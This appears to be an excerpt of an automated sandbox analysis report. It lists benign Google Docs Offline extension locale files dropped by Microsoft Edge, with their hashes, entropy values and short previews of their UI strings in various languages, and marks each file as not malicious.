                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
